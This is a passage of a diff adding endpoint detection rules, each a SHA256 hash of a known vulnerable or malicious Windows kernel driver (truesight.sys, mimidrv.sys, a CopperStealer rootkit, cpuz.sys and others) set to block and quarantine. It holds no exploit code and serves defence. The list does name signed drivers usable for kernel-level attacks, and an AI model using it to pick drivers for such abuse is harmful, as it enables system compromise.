+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "394e7ac3-b70b-5bee-9bae-796522e7b8bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155101Z",
+ "creation_date": "2026-03-23T11:45:31.155104Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a60d45a4456ca9eba653112533846099bd7b92da8ded755d03cad359a4a78f7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39587e0b-0903-5162-8ac7-a823897e6fd3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977296Z",
+ "creation_date": "2026-03-23T11:45:29.977298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977303Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45b969ae1b381716a29cd509622470b5b20b70c7efe4c9b7c0568faa298605ff",
+ "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "395d77d8-ebf5-539e-9aa0-f6f3e82c357c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981541Z",
+ "creation_date": "2026-03-23T11:45:29.981554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4582adb2e67eebaff755ae740c1f24bc3af78e0f28e8e8decb99f86bf155ab23",
+ "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "395fe212-9a74-599d-8698-ad670a25bc0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978371Z",
+ "creation_date": "2026-03-23T11:45:29.978373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978378Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e274df646f191d2705c0beaa35eeea84808593c3b333809f13632782e27ad75",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "397a1f1e-152a-535d-95ce-06c4560fbd44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147841Z",
+ "creation_date": "2026-03-23T11:45:31.147843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65f4d41cef7323a54f35954173de466c15b0a07219bc7810881f362576736b1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39801d61-de27-5902-ae06-b7cdff2dc6ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156603Z",
+ "creation_date": "2026-03-23T11:45:31.156605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d525a8d02162425964da64cb71cb2e268efe4bef4159b1ec9948eb791339363e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39812975-ad2f-58bc-b565-2a7d184e24f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971561Z",
+ "creation_date": "2026-03-23T11:45:29.971563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "950b672d3300bcacefe568156fbc8b16fa09da13df2f6ecda31254faaaf041f9",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3982ea71-9589-5dce-bcf5-2cddfa792d34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475129Z",
+ "creation_date": "2026-03-23T11:45:30.475133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475142Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "632d62103706b29f10ee8d88c39b5963d9fe388227e78c250e8011c1a43f266b",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "398b0af0-2ef7-5230-b9c1-74a683d3cb7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980151Z",
+ "creation_date": "2026-03-23T11:45:29.980152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dafa4459d88a8ab738b003b70953e0780f6b8f09344ce3cd631af70c78310b53",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "398d919d-df91-5e06-93fc-45ad0f0a8fc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150547Z",
+ "creation_date": "2026-03-23T11:45:31.150549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45ebf3df2b59032512b2b55fd5db17e777ca5fd36acccb31ff441c5d3531cb8a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "399b0dba-0247-583e-99dc-0dea7832a84d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476116Z",
+ "creation_date": "2026-03-23T11:45:31.476120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476129Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bed01ddc465cc807cd0dda20a0dab4d8c750c98fc23956e632c813e1f387195",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39a1eca2-d176-575a-ac93-2b13941f26be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977852Z",
+ "creation_date": "2026-03-23T11:45:29.977854Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977859Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x86.sys) [https://www.loldrivers.io/drivers/670dc258-78b5-4552-a16b-b41917c86f8d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39a79daa-7633-53f7-abe0-311ac3ca5a06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154769Z",
+ "creation_date": "2026-03-23T11:45:31.154771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154776Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "480eda1cfe3d0dac4782590399966ca677f2e3094ad2cdbb9c79a4199f3b9840",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39a8a443-3b4f-5eec-a6e8-a90f7c0336c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463914Z",
+ "creation_date": "2026-03-23T11:45:30.463917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40556dd9b79b755cc0b48d3d024ceb15bd2c0e04960062ab2a85cd7d4d1b724a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39b7c3c7-d04f-5949-bea8-eec49ceb274c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814185Z",
+ "creation_date": "2026-03-23T11:45:31.814188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79d2dd6c0e03728a542dfb2c8c2b4f52c1049ac96ce8dd7408f8e6452d0330e3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39b89cb3-f926-5a53-a955-78b6fca09343",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982801Z",
+ "creation_date": "2026-03-23T11:45:29.982803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982808Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0e74f565237c32989cb81234f4b5ad85f9dd731c112847c0a143d771021cb99",
+ "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39cb026c-6be2-5b35-ada2-eca51acbb39e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611796Z",
+ "creation_date": "2026-03-23T11:45:29.611798Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33b88ac3151f2192eaf4c2be3c7ad00e49090c8b94ec51b754e19ac784b087aa",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39d35dc2-0596-5f83-b0a0-f239b4d4b9d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822437Z",
+ "creation_date": "2026-03-23T11:45:31.822441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822449Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0cace0bf30720a79c34ad1c253313a35e15ab9f7257d0fea6b9a6b8d61f7b23",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39dd0f2e-cb03-5457-8d53-e614cd5b7acb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145782Z",
+ "creation_date": "2026-03-23T11:45:31.145784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "542d3172a05ce27d264e46e05da66101781c5e8cf802196c89effc7d9c0509be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39de56a7-0cb8-5671-a1f7-dbc017c030d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821442Z",
+ "creation_date": "2026-03-23T11:45:30.821445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31ffc8218a52c3276bece1e5bac7fcb638dca0bc95c2d385511958abdbe4e4a5",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39f6f5dd-9ea9-57ed-8462-875caf1faf74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834379Z",
+ "creation_date": "2026-03-23T11:45:30.834383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f66b8cb2bde015e2a031fa395bcb0d6920f7b55e229a5c88e0ec5772708a9dbe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39f7c046-3d67-504c-96af-05c5d4750b48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151178Z",
+ "creation_date": "2026-03-23T11:45:31.151180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c14d101cf793d7de96dc1d2551bf5e4747e7a80b2c1878116321024be257bb0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a09c3f2-96d6-5535-ab43-5f98f2c74e67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
